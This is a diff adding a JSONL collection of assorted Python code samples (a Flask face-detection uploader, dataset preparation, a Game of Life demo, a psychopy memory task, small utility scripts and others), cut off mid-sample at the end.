diff --git "a/2648.jsonl" "b/2648.jsonl" new file mode 100644--- /dev/null +++ "b/2648.jsonl" @@ -0,0 +1,700 @@ +{"seq_id":"260937182","text":"import os\nimport json\nimport uuid\nimport requests\nfrom facepp import app\nfrom flask import render_template, request\nfrom werkzeug.utils import secure_filename\nfrom facepp.pic_processing import pic_pro\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\nSAVE_PATH = 'facepp/static/log/'\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n try:\n # 尝试获取文件\n file = request.files['picture']\n except Exception as e:\n print(e)\n return '未知错误'\n filename_extension = secure_filename(file.filename).split('.')[-1]\n filename = uuid.uuid1()\n filename = '%s.%s' % (filename, filename_extension)\n file.save(\n os.path.join(SAVE_PATH, filename) # 保存图片 facepp/static/log\n )\n\n # 使用requests进行url的post请求\n url = \"https://api-cn.faceplusplus.com/facepp/v3/detect\"\n\n data = {\n 'api_key': os.environ.get('facepp_key'),\n 'api_secret': os.environ.get('facepp_secret'),\n 'return_attributes': 'gender,age,glass',\n\n }\n filename_and_path = \"facepp/static/log/%s\" % filename\n files = {'image_file': open(filename_and_path, 'rb')}\n r = requests.post(url, data=data, files=files)\n response_json = json.loads(r.text)\n # print(response_json)\n new_filename, face_list = pic_pro(response_json=response_json, file_path=filename_and_path)\n re_new_file = \"%s.jpg\" % new_filename\n # print('###\\n\\n', filename)\n # print(re_new_file)\n return render_template(\n \"indexPost.html\",\n img_path=[filename, re_new_file],\n demo_text=face_list\n )\n text1 = \"等待上传图片区域\"\n text2 = \"进行识别图片区域\"\n\n return render_template(\"index.html\", text1=text1, text2=text2)\n\n\n@app.route('/demo/')\ndef demo(num):\n demo1_response = [\n \"男性,34岁,未佩戴眼镜\",\n \"女性,31岁,未佩戴眼镜\",\n \"女性,11岁,未佩戴眼镜\"\n ]\n demo2_response = [\n \"女性,35岁,未佩戴眼镜\",\n \"女性,28岁,未佩戴眼镜\"\n ]\n demo3_response = [\n \"男性,27岁,配带墨镜\"\n ]\n demo_list = [demo1_response, demo2_response, demo3_response]\n pic_path = [\n \"img/demo-pic6.jpg\",\n \"img/demo-pic7.jpg\",\n \"img/demo-pic11.jpg\",\n \"img/finished6.jpg\",\n \"img/finished7.jpg\",\n \"img/finished11.jpg\"\n ]\n if num > len(demo_list):\n num = 1\n text1 = \"等待上传图片区域\"\n text2 = \"进行识别图片区域\"\n return render_template(\n \"demo.html\",\n text1=text1,\n text2=text2,\n demo_text=demo_list[num - 1],\n img_path=[pic_path[num - 1], pic_path[num + 2]]\n )\n","sub_path":"facepp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"3416850","text":"import os\nimport json\nimport nltk\nimport utils\nimport vocabulary\nimport numpy as np\nimport constants as C\n\n\ndef prepare(root, dataType, dataSubtype, validAnsSet, taskType=\"OpenEnded\"):\n\t\"\"\"\n\thelper function to prepare vqa dataset given the params\n\t:param root: location of VQAv2 dataset\n\t:param dataType: 'mscoco' for real and 'abstract_v002' for abstract\n\t:param dataSubtype: 'train / valid' + 'year'. Cannot used for test.\n\t:param validAnsSet: answer vocabulary (i.e. answers containing unknown vocab is invalid)\n\t:param taskType: 'MultipleChoice' or 'OpenEnded'. We only consider 'OpenEnded' here.\n\t:return: list of length=num_questions, each entry is a dict with following keys: {image_name, image_path,\n\t\t question_id, question_tokens, question_string, all_answers, valid_answers, question_len}\n\t\"\"\"\n\timgDir = os.path.join(root, \"Images\")\n\ttokenizer = nltk.tokenize.TweetTokenizer() # deal with ' better\n\t# initialize the locations of files\n\timgNameFormat, annPath, qstPath = utils.formName(root, dataType, dataSubtype, taskType)\n\t# load annotations, save as dict {key=qstID, value=ann}\n\tassert os.path.exists(annPath)\n\twith open(annPath) as file:\n\t\tannotations = json.load(file)[\"annotations\"]\n\t\tqst2ann_dict = {ann[\"question_id\"]: ann for ann in annotations}\n\t# load questions\n\tassert os.path.exists(qstPath)\n\twith open(qstPath) as file:\n\t\tquestions = json.load(file)[\"questions\"]\n\t# combine data we need\n\tdataset = []\n\tnum_unk_ans = 0\n\tfor i, qst in enumerate(questions):\n\t\t# print process\n\t\tif (i+1) % 10000 == 0:\n\t\t\tprint(\"Processed %d / %d questions\" % (i+1, len(questions)))\n\t\timgID = qst[\"image_id\"]\n\t\tqstID = qst[\"question_id\"]\n\t\tqstStr = qst[\"question\"]\n\t\timgName = imgNameFormat % imgID\n\t\timgPath = os.path.join(imgDir, imgName)\n\t\tqstToken = tokenizer.tokenize(qstStr) # a list of tokens\n\t\tqstLen = len(qstToken) # for attention\n\t\timgInfo = dict(image_name=imgName, image_path=imgPath,\n\t\t question_id=qstID, question_tokens=qstToken,\n\t\t question_string=qstStr, question_len=qstLen)\n\t\t# load answers for train or validation\n\t\tann = qst2ann_dict[qstID]\n\t\tallAns = [a[\"answer\"] for a in ann[\"answers\"]]\n\t\tvalidAns = [a for a in allAns if a in validAnsSet]\n\t\t# answers may not appear in our vocabulary\n\t\tif len(validAns) == 0:\n\t\t\tvalidAns = [\"\"]\n\t\t\tnum_unk_ans += 1\n\t\timgInfo[\"all_answers\"] = allAns\n\t\timgInfo[\"valid_answers\"] = validAns\n\t\tdataset.append(imgInfo)\n\treturn dataset\n\n\ndef load_dataset(mode, trainFile=\"train.npy\", validFile=\"valid.npy\",\n ansFilename=\"vocab_answers.txt\", qstFilename=\"vocab_questions.txt\"):\n\t\"\"\"\n\tload prepared train and validation dataset\n\t:param mode: 'train' or 'valid'\n\t:param trainFile: filename of prepare train dataset\n\t:param validFile: filename of prepare validation dataset\n\t:param ansFilename: filename of answer vocab\n\t:param qstFilename: filename of question vocab\n\t:return: prepare train data if mode == 'train' else validation data\n\t\"\"\"\n\t# load savedVocab\n\tansVocab, _ = vocabulary.load_vocab(ansFilename, qstFilename)\n\tsavedAnsSet = set(ansVocab.wordList)\n\ttrainPath = os.path.join(C.DIR_DATA, trainFile)\n\tvalidPath = os.path.join(C.DIR_DATA, validFile)\n\t# if no saved files, call `prepare()` and save it\n\tif not (os.path.exists(trainPath) and os.path.exists(validPath)):\n\t\ttrain, validation = [], []\n\t\tfor dataType in C.TRAIN:\n\t\t\tsubtypes = C.TRAIN[dataType]\n\t\t\tfor subtype in subtypes:\n\t\t\t\tprint(\"prepare %s %s\" % (dataType, subtype))\n\t\t\t\ttrain += prepare(C.ROOT, dataType, subtype, savedAnsSet)\n\t\tfor dataType in C.VALIDATION:\n\t\t\tsubtypes = C.VALIDATION[dataType]\n\t\t\tfor subtype in subtypes:\n\t\t\t\tprint(\"prepare %s %s\" % (dataType, subtype))\n\t\t\t\tvalidation += prepare(C.ROOT, dataType, subtype, savedAnsSet)\n\t\tnp.save(trainPath, np.array(train))\n\t\tnp.save(validPath, np.array(validation))\n\t# load .npy files\n\ttrain, validation = np.load(trainPath, allow_pickle=True), np.load(validPath, allow_pickle=True)\n\treturn train if mode == \"train\" else validation\n","sub_path":"preparation.py","file_name":"preparation.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639055307","text":"from os import system\nfrom json import load\nfrom urllib2 import urlopen\nfrom time import sleep, ctime\n\ndef getIP(maxN=10, S=30):\n\tip = False\n\tn = 0\n\tgoon = True\n\twhile n < maxN and goon:\n\t\ttry:\n\t\t\tn = n + 1\n\t\t\tip = load(urlopen('https://api.ipify.org?format=json'))['ip']\n\t\t\tgoon = False\n\t\texcept:\n\t\t\ttry:\n\t\t\t\tip = load(urlopen('http://jsonip.com'))['ip']\n\t\t\t\tgoon = False\n\t\t\texcept:\n\t\t\t\tprint('Error getting IP on attempt ' + str(n) + '. Sleeping for ' + str(S) + ' seconds.')\n\t\t\t\tsleep(S)\n\treturn(ip)\n\nwith open('/home/joakim/work/startup.log', 'wb') as logFile:\n\ttmpStr = ctime() + ': Starting readyHP.py'\n\tstatStr = '*'*len(tmpStr) + '\\n' + tmpStr + '\\n' + '*'*len(tmpStr) + '\\n\\n' \n\tlogFile.write(statStr)\n\n#Check connection\ndone = False\nt = 0\nwhile not done:\n\tt = t + 1\n\tif t == 15:\n\t\t#20 minutes already. Try bouncing it.\n\t\tprint(ctime() + ': Rebooting')\n\t\tsystem('sudo reboot')\n\tping = system('ping -c 1 60.241.126.187')\n\tif ping == 0:\n\t\tdone = True\n\t\tmess = '\\n' + ctime() + ': Connection established. Proceeding to pull from git.\\n'\n\t\tprint(mess)\n\t\twith open('/home/joakim/work/startup.log', 'ab') as logFile:\n\t\t\tlogFile.write(mess)\n\telse:\n\t\tmess = ctime() + '(' + str(t) + '): No connection. Restarting network service and sleeping for 90 seconds.\\n'\n\t\tprint(mess)\n\t\twith open('/home/joakim/work/startup.log', 'ab') as logFile:\n\t\t\tlogFile.write(mess)\n\t\tsystem('sudo service network-manager restart')\n\t\tsleep(90)\n\n# Pull from git\ngitpull = system('sudo bash ~/work/scraper/gitpull.sh')\n#gitpull = 'disabled'\n\n# Connect to VPN\nmess = '\\n' + ctime() + ': Pulled from git (' + str(gitpull) + '). Proceeding to connect VPN.\\n'\nprint(mess)\nwith open('/home/joakim/work/startup.log', 'ab') as logFile:\n\tlogFile.write(mess)\nsystem('sudo bash /home/joakim/work/scraper/convpn.sh')\n","sub_path":"hp1_convpn.py","file_name":"hp1_convpn.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"395211573","text":"import pygame\n\nBOARDWIDTH = 64 # how many columns in the board\nBOARDHEIGHT = 64 # how many rows in the board\nSQUARESIZE = 16 # width & height of each space in pixels\n\nGRIDCOLOR = (0, 0, 255)\n\n\n# constants for direction values\nUP = 'up'\nDOWN = 'down'\nLEFT = 'left'\nRIGHT = 'right'\n\n# The amount of space to the sides of the board to the edge of the window\n# is used several times, so calculate it once here and store in variables.\nXMARGIN = 4\nYMARGIN = 4\n\nWINDOWWIDTH = BOARDWIDTH * SQUARESIZE + (XMARGIN * 2)\nWINDOWHEIGHT = BOARDHEIGHT * SQUARESIZE + (YMARGIN * 2)\n\ngameBoards = []\nboard = 0\n\n\ndef main():\n global FPSCLOCK, DISPLAYSURF, BASICFONT, BOARDRECTS\n # Initial set up.\n\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n pygame.display.set_caption('Life')\n BASICFONT = pygame.font.Font('freesansbold.ttf', 36)\n # Create pygame.Rect objects for each board space to\n # do board-coordinate-to-pixel-coordinate conversions.\n BOARDRECTS = []\n for x in range(BOARDWIDTH):\n BOARDRECTS.append([])\n for y in range(BOARDHEIGHT):\n r = pygame.Rect((XMARGIN + (x * SQUARESIZE),\n YMARGIN + (y * SQUARESIZE),\n SQUARESIZE,\n SQUARESIZE))\n BOARDRECTS[x].append(r)\n\n global gameBoards\n global board\n gameBoards = [get_blank_board(), get_blank_board()]\n\n DISPLAYSURF.fill((0, 0, 0))\n\n while True:\n draw_board()\n\n bb = (board + 1) % len(gameBoards)\n\n for x in xrange(BOARDWIDTH):\n for y in xrange(BOARDHEIGHT):\n gameBoards[bb][x][y] = rules(x, y)\n\n board = bb\n\n FPSCLOCK.tick(30)\n\n\ndef get_blank_board():\n # Create and return a blank board data structure.\n the_board = []\n\n for x in range(BOARDWIDTH):\n the_board.append([0] * BOARDHEIGHT)\n\n the_board[10][10] = 1\n the_board[11][10] = 1\n the_board[12][10] = 1\n the_board[12][9] = 1\n the_board[11][8] = 1\n return the_board\n\n\ndef count_neighbours(x, y):\n count = 0\n\n count += gameBoards[board][(x - 1) % BOARDWIDTH][y]\n count += gameBoards[board][(x - 1) % BOARDWIDTH][(y - 1) % BOARDHEIGHT]\n count += gameBoards[board][x][(y - 1) % BOARDHEIGHT]\n count += gameBoards[board][(x + 1) % BOARDWIDTH][(y - 1) % BOARDHEIGHT]\n count += gameBoards[board][(x + 1) % BOARDWIDTH][y]\n count += gameBoards[board][(x + 1) % BOARDWIDTH][(y + 1) % BOARDHEIGHT]\n count += gameBoards[board][x][(y + 1) % BOARDHEIGHT]\n count += gameBoards[board][(x - 1) % BOARDWIDTH][(y + 1) % BOARDHEIGHT]\n\n return count\n\n\ndef rules(x, y):\n value = gameBoards[board][x][y]\n count = count_neighbours(x, y)\n\n if (value == 1 and count == 2) or count == 3:\n return 1\n\n return 0\n\n\ndef draw_board():\n for x in xrange(BOARDWIDTH):\n for y in xrange(BOARDHEIGHT):\n\n if gameBoards[board][x][y] == 1:\n DISPLAYSURF.fill((255, 0, 0), BOARDRECTS[x][y])\n else:\n DISPLAYSURF.fill((0, 0, 0), BOARDRECTS[x][y])\n\n pygame.draw.rect(DISPLAYSURF, (128, 128, 128), BOARDRECTS[x][y], 1)\n\n pygame.display.update()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"519551974","text":"from django.conf.urls import url\r\n\r\nfrom . import views\r\n# === Configurazione URLS per FactoryManagerApp ===\r\nurlpatterns = [\r\n # url che porta alla scheda descrittiva del database\r\n url(r'^schedadescrittiva/', views.schedaDescrittiva , name='test'),\r\n # url che porta alla scheda descrittiva dei dipendenti\r\n url(r'^dipendenti/', views.schedaDipendenti , name='dip'),\r\n # url che porta alla scheda descrittiva degli ambienti\r\n url(r'^ambienti/', views.schedaAmbienti , name='space'),\r\n # url che porta alla scheda descrittiva degli strumenti\r\n url(r'^strumenti/', views.schedaStrumenti , name='tools'),\r\n # url che permette di scaricare il pdf del report completo\r\n url(r'^schedapdf/', views.pdf_view , name='schedapdf'),\r\n]","sub_path":"FactoryManagerApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"627721522","text":"#!/usr/bin/env python\nfrom __future__ import division\n\nimport numpy as np\nimport os\nimport glob\n\nA = np.loadtxt('galaxyzoo/training_solutions_rev1.csv',delimiter=',',usecols=(1,2,3))\n\nnames = np.loadtxt('galaxyzoo/training_solutions_rev1.csv',delimiter=',',usecols=(0,))\n\nclassification = np.zeros( len(A[:,0]) )\nfor i in xrange(0,len(A[:,0])):\n classification[i] = np.argmax(A[i,0:3])\n #if classification[i]==2:\n # print 'YOLO we found a loser! Motherfucker!'\n \nimage_names=[]\nvariation_names=[]\ntotalnames = []\nfor file in glob.glob(\"galaxyzoo/images_augmentation/*.jpg\"):\n name = file\n totalnames.append(str(name))\n name = name.split('/')[-1]\n tempname = name\n name = name.split('-')[0]\n name2 = tempname.split('-')[1]\n name2 = name2.split('.')[0]\n image_names.append(str(name))\n variation_names.append(str(name2))\n\nclas = np.zeros(len(image_names))\nj=0\nfor i in xrange(0,len(image_names)):\n if int(image_names[i]) == int(names[j]):\n clas[i] = classification[j]\n else:\n j+=1\n clas[i] = classification[j]\n \n os.rename(totalnames[i],'galaxyzoo/images_augmentation/'+str(image_names[i])+'-'+str(variation_names[i])+'_'+str(int(clas[i]))+'.jpg' )\n\n\n","sub_path":"easyloadtraining.py","file_name":"easyloadtraining.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"393797979","text":"'''Rita Sonka\n10/24/2016\nPh 20\nhw 4\n'''\n\n\n\nimport numericalSpring as nS\n\n\n# This is the master \"make plots\" file, the one I originally made before being told I needed to have the makefile update images individually (could in theory make sense if one took really long to make...). Preserved just in case.\n\ngraphicsFolder = \"../week3Graphics/\"\n\n# Figure 1\nnS.plotExplicitEuler(0, 5, .2, 100, graphicsFolder + \"explicitEuler1.pdf\")\n# Figure 2\nnS.plotExplicitEulerErrors(0, 5, .2, 100, graphicsFolder + \"explicitEulerErrors1.pdf\")\n# Figure 3\nnS.eE_truncation(0, 5, .04, 20, graphicsFolder + \"eE_truncation.pdf\")\n# Figure 4\nnS.eE_energy(0, 5, .2, 100, graphicsFolder + \"eE_energy.pdf\")\n# Figure 5\nnS.plotImplicitEuler(0, 5, .2, 100, graphicsFolder + \"implicitEuler1.pdf\")\n# Figure 6\nnS.plotImplicitEulerErrors(0, 5, .2, 100, graphicsFolder + \"implicitEulerErrors1.pdf\")\n# Figure 7\nnS.iE_energy(0, 5, .2, 100, graphicsFolder + \"iE_energy.pdf\")\n# Figure 8 (actually two files)\nnS.eE_iE_phaseSpace(0, 5, .2, 100, graphicsFolder + \"eE_phaseSpace.pdf\", graphicsFolder + \"iE_phaseSpace.pdf\")\n# Figure 9\nnS.symp_phaseSpace(0, 5, .2, 100, graphicsFolder + \"symp_phaseSpace.pdf\")\n# Figure 10\nnS.symp_energy(0, 5, .2, 100, graphicsFolder + \"symp_energy.pdf\")\n# Figure 11\nnS.symp_lag(0, 5, .2, 1000, graphicsFolder + \"symp_lag.pdf\")\n\n","sub_path":"plotGenerationScripts/makePlots.py","file_name":"makePlots.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"62938822","text":"class Paciente:\r\n def __init__(self, id, nombre, apellido, fecha_nacimiento, sexo, nombre_usuario, pwd, telefono):\r\n self.id = id\r\n self.nombre = nombre\r\n self.apellido = apellido\r\n self.fecha_nacimiento = fecha_nacimiento\r\n self.sexo = sexo\r\n self.nombre_usuario = nombre_usuario\r\n self.pwd = pwd\r\n self.telefono = telefono\r\n\r\n def dump(self):\r\n return {\r\n 'id': self.id,\r\n 'nombre': self.nombre,\r\n 'apellido': self.apellido,\r\n 'fecha_nacimiento': self.fecha_nacimiento,\r\n 'sexo': self.sexo,\r\n 'nombre_usuario': self.nombre_usuario,\r\n 'pwd': self.pwd,\r\n 'telefono': self.telefono\r\n }","sub_path":"paciente.py","file_name":"paciente.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"99146163","text":"#P56\n\n\"\"\"\nA googol (10**100) is a massive number: one followed by one-hundred zeros; 100100 is almost unimaginably large: one followed by two-hundred zeros. Despite their size, the sum of the digits in each number is only 1.\n\nConsidering natural numbers of the form, a**b, where a, b < 100, what is the maximum digital sum?\n\"\"\"\nmax_sum=0\nfor a in range(1,100):\n for b in range(1,100):\n number=a**b\n digits=[]\n str_number=str(number)\n for th_digit in range(0,len(str_number)):\n digits.append(int(str_number[th_digit]))\n current_sum=sum(digits)\n if max_sum < current_sum:\n max_sum=current_sum\n\nprint(max_sum)\n","sub_path":"P56.py","file_name":"P56.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"488607884","text":"'''\nCreated on Feb 23, 2015\n\nThis module is intended to have all constants and global values for pim_dm\n\n@author: alex\n'''\n\nASSERT_TIME = 180\n\nGRAFT_RETRY_PERIOD = 3\n\nOVERRIDE_INTERVAL = 2.5\n\nJT_OVERRIDE_INTERVAL = 3.0\n\nT_LIMIT = 210","sub_path":"src/pim_dm/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"51769783","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 28 16:15:24 2019\n\n@author: Francois\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom psychopy import core\nfrom psychopy import data\nfrom psychopy import event\nfrom psychopy import visual\nfrom Categories import Categories\nfrom flatten import flatten\nfrom randSign import randSign\n\nclass imTask(object):\n def __init__(self,nTrial,nStim):\n self.nTrial = nTrial\n self.nStim = nStim\n self.categs = Categories(nTrial,nStim)\n self.encDict = self.categs.encDF.to_dict(orient=\"index\")\n self.recDict = self.categs.recDF.to_dict(orient=\"index\")\n# self.encTask = Encoding(nTrial,nStim)\n self.encStimlist = []\n self.answerlist = []\n self.stimpos = {'0':(-250.0, 250.0),\n '1':(250.0, 250.0),\n '2':(250.0, -250.0),\n '3':(-250.0, -250.0)}\n \n self.targetPos = self.getTargPos()\n \n self.encInstStartText = '''\\\n ... Memorize the following images and\n ... their location on screen.\\\n ... Press space to start.\\\n '''.format()\n \n self.recInstStartText = '''\\\n ... A series of {x} images will appear.\n ... Indicate if shown image corresponds to a previously seen image\n ... and in which quadrant it has appeared earlier.\n ... Press SPACE to start\\\n '''.format(x=self.nStim+1)\n \n self.recInstText1 = '''\\\n ... Have you seen this picture before?\n ... If yes, press \"y\". If not, press \"n\".\\\n '''.format()\n \n self.recInstText2 = '''\\\n ... Where have you seen it? \n ... Press 0, 1, 2 or 3 to answer\\\n '''.format()\n \n self.recInstPosText = '''\\\n ... Where have you seen it?\n ... 0 = upper-left, 1 = upper-right\n ... 2 = lower-left, 3 = lower-right\\\n '''.format()\n \n self.ansSaveText = 'Answer saved!'\n \n self.endText = 'Thank you for your time, goodbye!'\n\n def setstimpos(self):\n setpos = (randSign()*250, randSign()*250)\n return setpos\n \n def getTargPos(self):\n for encstim in range(len(self.encStimlist)):\n for name,pos in self.encStimlist[encstim]:\n if name == self.thisTrialTarg:\n targPos = pos\n return targPos\n\n def getAnswers(self):\n for stim in range(len(self.TrialDict['recStims'])):\n shownStim = self.TrialDict['recStims'][stim]\n if shownStim == self.thisTrialTarg:\n# print('TargetFound!')\n if 'y' in self.TrialDict['Recognition'][stim]:\n if self.TrialDict['StimPosAnswers'][stim] == self.targetPos:\n self.answerlist.append('recogOKposOK')\n elif self.TrialDict['StimPosAnswers'][stim] != self.targetPos:\n self.answerlist.append('recogOKposWrong')\n elif 'n' in self.TrialDict['Recognition'][stim]:\n self.answerlist.append('Miss')\n elif shownStim != self.thisTrialTarg:\n if 'y' in self.TrialDict['Recognition'][stim]:\n self.answerlist.append('FalseAlarm')\n elif 'n' in self.TrialDict['Recognition'][stim]:\n self.answerlist.append('RejectOK')\n return self.answerlist\n \n def runEnc(self,whichTrial):\n self.whichTrial = whichTrial\n self.thisEncTrial = self.encDict[self.whichTrial]\n self.win = visual.Window(size=(1000, 1000), \n color=(0, 0 , 0), \n units = 'pix')\n self.encInstStart = visual.TextStim(self.win, \n text = self.encInstStartText)\n self.encInstStart.draw()\n self.win.flip()\n event.waitKeys(keyList=[\"space\"])\n for stim in range(len(self.thisEncTrial)):\n encstim = visual.ImageStim(self.win,\n self.thisEncTrial[stim],\n color=(1,1,1), \n pos = self.setstimpos(), \n size = (500, 500),\n name=self.thisEncTrial[stim])\n encstim.draw()\n self.win.flip()\n encStimTuple = (encstim.name, tuple(encstim.pos))\n \n self.encStimlist.append(encStimTuple)\n core.wait(1)\n \n self.win.close()\n self.stimDF = pd.DataFrame(self.encStimlist,columns=['encStims', 'encPos'])\n self.stimDict = self.stimDF.to_dict(orient=\"dict\")\n# self.stimDF.to_csv(os.getcwd()+'\\\\stimDF2.csv')\n return self.encStimlist\n\n#for stimName, stimPos in stimTuple:\n# for (key,value) in self.TrialDict.items():\n# for (key,value) in self.stimpos.items():\n# if self.TrialDict[value] == self.stimpos[key]:\n# stimTuple = (stimulus.name, stimulus.pos, self.stimpos) \n\n \n \n def runRec(self,whichTrial):\n self.whichTrial = whichTrial\n \n self.thisRecTrial = self.recDict[self.whichTrial]\n \n self.thisTrialTarg = self.categs.Targs[self.whichTrial]\n\n self.win = visual.Window(size=(1000, 1000), \n color=(0, 0 , 0), \n units = 'pix')\n \n self.recInstStart = visual.TextStim(self.win,\n text=self.recInstStartText)\n \n self.recInstPos = visual.TextStim(self.win,\n text=self.recInstPosText,\n pos=(0.0,-300))\n \n self.recInst1 = visual.TextStim(self.win,\n text=self.recInstText1,\n pos=(0.0,300))\n \n self.recInst2 = visual.TextStim(self.win,\n text=self.recInstText2)\n\n self.ansRec = visual.TextStim(self.win,\n text=self.ansSaveText)\n \n self.end = visual.TextStim(self.win, text=self.endText)\n \n self.stimNamelist = []\n self.recKeylist = []\n posAnsKeys= []\n self.stimPosAnswers = []\n self.recInstStart.draw()\n self.win.flip()\n \n event.waitKeys(keyList=[\"space\"])\n for stim in range(len(self.thisRecTrial)):\n stimulus = visual.ImageStim(self.win,\n self.thisRecTrial[stim],\n color=(1,1,1), \n pos = (0.0,0.0), \n size = (500, 500),\n name=self.thisRecTrial[stim])\n self.recInst1.draw()\n self.recInst1.autoDraw = True\n stimulus.draw()\n self.win.flip()\n recKeys = event.waitKeys(keyList=['y','n'])\n if 'y' in recKeys:\n self.recInst2.draw()\n self.win.flip()\n posKeys = event.waitKeys(keyList=['0','1','2','3'])\n posAnsKeys.append(posKeys)\n core.wait(1)\n elif 'n' in recKeys:\n posAnsKeys.append('None')\n self.posKeylist = flatten(posAnsKeys)\n self.recKeylist.append(recKeys)\n self.stimNamelist.append(stimulus.name)\n self.ansRec.draw()\n self.win.flip()\n core.wait(1)\n for posKey in range(len(self.posKeylist)):\n if self.posKeylist[posKey] != 'None':\n self.stimPosAnswers.append(self.stimpos[str(posKey)])\n elif self.posKeylist[posKey] == 'None':\n self.stimPosAnswers.append('None')\n \n self.TrialDict = {'recStims':self.stimNamelist,\n 'Recognition':flatten(self.recKeylist),\n 'PosKeylist':self.posKeylist,\n 'StimPosAnswers':self.stimPosAnswers}\n \n# for answer in self.TrialDict['PosAnswers']:\n self.TrialDF = pd.DataFrame(self.TrialDict)\n self.end.draw()\n self.win.flip()\n core.wait(2)\n self.win.close()\n return self.TrialDict\n\ntask01 = imTask(2,3)\n\nenctask01 = task01.runEnc(0)\nrectask01 = task01.runRec(0) \nanswerlist = task01.getAnswers()\n\n#task02 = imTask(0,2,3)\n#stimpos02 = task02.stimpos\n#encdict02 = task02.encDict[0]\n#targ02 = task02.categs.Targs[0]\n#recdict02 = task02.recDict[0]\n#enctask02 = task02.runEnc()\n#rectask02 = task02.runRec() \n#\n#bigdict= {'encdict':encdict02, 'targ':targ02, 'recdict':recdict02, 'enctask02':enctask02, 'rectask':rectask02}\n#targ02test = task02.categs.Targs\n#for item in range(len(rectask01['PosKeylist'])):\n# print(item)\n#enc = Encoding(2,3).trials.trialList[0]['Encoding']","sub_path":"fullTask.py","file_name":"fullTask.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"620902816","text":"# -*- coding: UTF-8 -*-\nimport logging\nfrom collections import OrderedDict\n\nfrom jetCore.db.tables import dbCollateral, dbCollateralMap\nfrom jetCore.reference.reftable import refTable\n\n__pgmname__ = \"Collateral\"\n__author__ = \"AJ Reynolds\"\n__email__ = \"ar380v@att.com\"\n\n__maintainer__ = __author__\n\nlog = logging.getLogger(__pgmname__)\n\n\nclass Collateral(refTable):\n \"\"\"\n Purpose:\n jetObject for a Collateral Entry\n \"\"\"\n\n def __init__(self, parent=None, *args, **kwargs):\n super(Collateral, self).__init__()\n self.Collateral_ID = None\n self._recommendation_ID = None\n self.CType = None\n self.Title = None\n self.Description = None\n self.Notes = None\n self.URL = None\n self.Created = None\n self.Created_By = None\n self.Updated = None\n self.Updated_By = None\n self.AffinityP = {}\n self.AffinityC = {}\n\n self._fieldMap = OrderedDict()\n self._fieldMap['CType'] = 'Type'\n self._fieldMap['Title'] = 'Title'\n self._key = 'Collateral_ID'\n self._value = 'Title'\n self._dbCollateral = None\n self._dbRecCollat = None\n delattr(self, 'Order')\n self.loadAttr(dbCollateral, **kwargs)\n self.parent = parent\n return\n\n @property\n def ID(self):\n return self.Collateral_ID\n\n @ID.setter\n def ID(self, value):\n self.Collateral_ID = value\n\n\ndef get_collateral():\n import contextlib\n from jetCore.db import db\n\n with contextlib.closing(db.session) as session:\n _collatList = {}\n _collateral = Collateral(Collateral_ID='Collateral', CType='Collateral')\n _items = session.query(dbCollateral).all()\n for _item in _items:\n _collat = Collateral(**_item.as_dict())\n _collatList[_collat.key] = _collat\n _ctype = _collateral.find(_item.CType)\n if _ctype is None:\n _ctype = Collateral(Collateral_ID=_item.CType, CType=_item.CType)\n _collateral.add(_ctype)\n _ctype.add(_collat)\n\n _items = session.query(dbCollateralMap).all()\n for _item in _items:\n # 1 is Strong --> 3 weak\n addParentToChildAffinity(_collatList[_item.Parent_CID],\n _item.RelationshipAffinity,\n _item.Child_CID)\n addChildToParentAffinity(_collatList[_item.Child_CID],\n _item.RelationshipAffinity,\n _collatList[_item.Parent_CID])\n # print(RenderTree(_collateral, style=AsciiStyle()))\n return _collateral\n\n\ndef addParentToChildAffinity(collateral, affinity, childID):\n if affinity not in collateral.AffinityP or childID not in collateral.AffinityP[affinity]:\n try:\n collateral.AffinityP[affinity].append(childID)\n except:\n collateral.AffinityP[affinity] = [childID]\n return\n\n\ndef addChildToParentAffinity(collateral, affinity, parentID):\n if collateral.CType == 'Principle': # ToDo: Fix the data\n return\n if affinity not in collateral.AffinityC or parentID not in collateral.AffinityC[affinity]:\n try:\n collateral.AffinityC[affinity].append(parentID)\n except:\n collateral.AffinityC[affinity] = [parentID]\n return\n","sub_path":"jetCore/reference/collateral.py","file_name":"collateral.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"42251555","text":"from config import source_dir, pofile\n\nfiles = source_dir.glob('**/*.po')\n\nfor file in files:\n changed = False\n po = 